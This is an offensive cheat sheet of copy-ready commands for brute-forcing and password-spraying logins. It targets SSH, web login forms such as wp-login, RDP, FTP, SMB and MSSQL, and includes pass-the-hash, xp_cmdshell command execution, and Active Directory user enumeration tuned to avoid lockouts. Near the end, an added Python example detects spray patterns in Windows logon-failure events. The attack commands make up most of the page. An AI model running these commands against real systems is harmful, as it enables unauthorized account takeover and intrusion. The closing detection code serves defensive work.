Authentication tests

Login/Authentication - Brute Force

From Linux

SSH

crackmapexec <ssh> <ip/range> -u user -p password (-d <domain or .>)
auxiliary/scanner/ssh/ssh_login
hydra -e nsr -l root -P <dico> <ip> ssh
hydra -e nsr -L <userlist.txt> -P <dico> -s 22 -V <ip> ssh

HTTP

cewl <url> -m 6 -w cewl.txt
john --wordlist=cewl.txt --rules --stdout > mutated.txt
medusa -h <ip> -u <user> -P mutated.txt -M http -n 80 -m DIR:</directory/to/login/panel> -T 30

Match success string

hydra -e nsr -s 443 -S -l <username> -P <dico.txt> -t <16> \
        <ip> https-post-form \
        "<url>:<username_var>=^USER^&<password_var>=^PASS^:S=<match success>(:H=Host\: <vhost>)"

Match failed attempt string

hydra -e nsr -s 443 -S -l <username> -P <dico.txt> -t <16> \
        <ip> https-post-form \
        "<url>:<username_var>=^USER^&<password_var>=^PASS^:F=<failed attempt string>(:H=Host\: <vhost>)"
hydra -e nsr -s 443 -S -l admin -P <dico.txt> -t 16 <ip> https-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:S=302 Found"
xhydra (ftp/pop3/smtp/snmp/http/ssh/mysql/vnc/...)
medusa -h <ip> -u <user> -P <dict> -m DIR:</phpmyadmin/> -t <10> -M http

MySQL

mysql -h <ip> --user=<username> --password=<password> (DB)

MSSQL

sqsh -S <ip>:<port> -U <user> -P <password>
sqlcmd -S <ip>,<port> -U SA -P <password>
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=<password>,ms-sql-xp-cmdshell.cmd="whoami" <ip>

RDP (not tested)

rdesktop <ip>
rdesktop <ip> -u <user> -p - -d <domain> -g <1280x1024>
rdesktop <ip> -u <user> -p <password> -d <domain> -g <1280x1024>
rdesktop <ip> -u <user> -p <password> -g <85%> -r disk:share=</path/to/share>
hydra -e nsr -t <10> -V -f -L <users.txt> -P <dict> rdp://<ip>
xfreerdp /v:<ip>:<port> /u:<user> /p:<password> /d:<domain> /dynamic-resolution
xfreerdp /v:<ip>:<port> /u:<user> /pth:<ntlm_hash> /d:<domain> /dynamic-resolution
ncrack -vv --user <user> -P <dict> rdp://<ip>

FTP

auxiliary/scanner/ftp/ftp_login
medusa -h <ip> -u <user> -P <dict> -M ftp -t 10

SMB

smbclient //<ip>/<c$> <password> -U <user>
crackmapexec <smb> <ip/range> -u user -p password (-d <domain or .>)

From Windows

for /f %i in (<dico.txt>) do @echo %i & @net use \\<ip> %i /u:<user> 2>nul && pause

Append result into a file

for /f %i in (<dico.txt>) do @echo %i & @net use \\<ip> %i /u:<user> 2>nul && echo <user>: %i >> <out.txt>

Password spray

List targets

Users list

([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties.samaccountname
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(samaccountname=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(badpwdcount<=<max_lockout_attempt - 2>))").FindAll().Properties.samaccountname

Administrators list

Default protected administrative groups in Active Directory:

  • Enterprise Admins
  • Schema Admins
  • Domain Admins
  • Administrators
  • Account Operators
  • Server Operators
  • Print Operators
  • Backup Operators
  • Cert Publishers
  • Domain Controllers
  • Read-Only Domain Controllers
  • Replicator

([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname

Never expired accounts

([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties | ForEach-Object{ if (($_.useraccountcontrol[0] -band 0x00010000) -and -not ($_.useraccountcontrol[0] -band 0x00000002)){ Write-Host $_.cn}}

Clean list without disabled accounts or accounts close to lockout
https://github.com/dafthack/DomainPasswordSpray

Get-DomainUserList -RemoveDisabled -RemovePotentialLockouts

Attacks

Invoke-DomainPasswordSpray (-UserList users.txt) -Domain <domain_name> (-PasswordList <passlist.txt> | -Password <password>) -OutFile <loot.txt>
Invoke-DomainPasswordSpray -Domain <domain_name> -Password <password> -OutFile <loot.txt>

CME

while read user; do crackmapexec smb <range> -u $user -p <password> -d <domain>; done < <users.txt>
while read user; do crackmapexec smb <range> -u $user -p $user -d <domain>; done < <users.txt>

MSF

use auxiliary/scanner/smb/smb_login

RDPassSpray
https://github.com/xFreed0m/RDPassSpray

python3 RDPassSpray.py -U <users.txt> -p <password> -d <domain> -t <host>

Kerberos methods - NOT TESTED

python kerbrute.py -domain <domain> -users <users.txt> -passwords <dico.txt> -outputfile <out>
.\Rubeus.exe brute [/users:<users.txt>] /passwords:<dico.txt> [/domain:<domain>] /outfile:<out>
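The spray loops above (one password across a user list) and the single-account brute-force commands at the top of the page leave different shapes in Windows 4625 logon-failure events. The detection side, as an added example that is not part of the original cheat sheet: it flags a source that fails against many accounts with few tries each, run over constructed sample events (field names TimeCreated, TargetUserName, IpAddress and SubStatus follow event 4625; the thresholds are assumptions to tune).

```python
"""Flag password-spray patterns in Windows 4625 (logon failure) events.
Added example for this cheat sheet, not part of it; records are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

FAILURE_CODES = {"0xC000006A", "0xC0000064"}  # SubStatus: bad password, unknown user
# Constructed events: (TimeCreated, TargetUserName, IpAddress, SubStatus)
SAMPLE_EVENTS = [
    # one password tried once against many accounts from 10.0.0.7: a spray
    ("2024-05-01T09:00:01", "alice", "10.0.0.7", "0xC000006A"),
    ("2024-05-01T09:00:03", "carol", "10.0.0.7", "0xC000006A"),
    ("2024-05-01T09:00:05", "dave", "10.0.0.7", "0xC000006A"),
    ("2024-05-01T09:00:07", "erin", "10.0.0.7", "0xC0000064"),
    ("2024-05-01T09:00:09", "frank", "10.0.0.7", "0xC000006A"),
    ("2024-05-01T09:00:11", "Grace", "10.0.0.7", "0xC000006A"),
    # six guesses against one account from 10.0.0.9: brute force, not a spray
    *[(f"2024-05-01T09:01:{s:02d}", "bob", "10.0.0.9", "0xC000006A")
      for s in range(0, 12, 2)],
    # a single mistyped password from 10.0.0.5: benign noise
    ("2024-05-01T09:05:00", "heidi", "10.0.0.5", "0xC000006A"),
]

def failures_by_source(events):
    """Group failed logons by source IP, time-sorted, user names lower-cased."""
    by_src = defaultdict(list)
    for ts, user, src, sub in events:
        if sub in FAILURE_CODES:
            by_src[src].append((datetime.fromisoformat(ts), user.lower()))
    for attempts in by_src.values():
        attempts.sort()
    return by_src

def detect_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Return {source_ip: [accounts]} for sources failing against at least
    min_users distinct accounts inside one window, none tried more than
    max_per_user times: many accounts, few tries each, is the spray shape."""
    hits = {}
    for src, attempts in failures_by_source(events).items():
        flagged, start = set(), 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1  # slide so attempts[start:end+1] spans at most `window`
            per_user = defaultdict(int)
            for _, user in attempts[start:end + 1]:
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                flagged.update(per_user)
        if flagged:
            hits[src] = sorted(flagged)
    return hits
```

A single-account brute force (10.0.0.9 above) fails the min_users check and is left for a per-account failure-count rule; lowering the lockout threshold in the spray's favour is exactly what the `badpwdcount` filter earlier on the page is built around, so the window and thresholds here should be set against that policy.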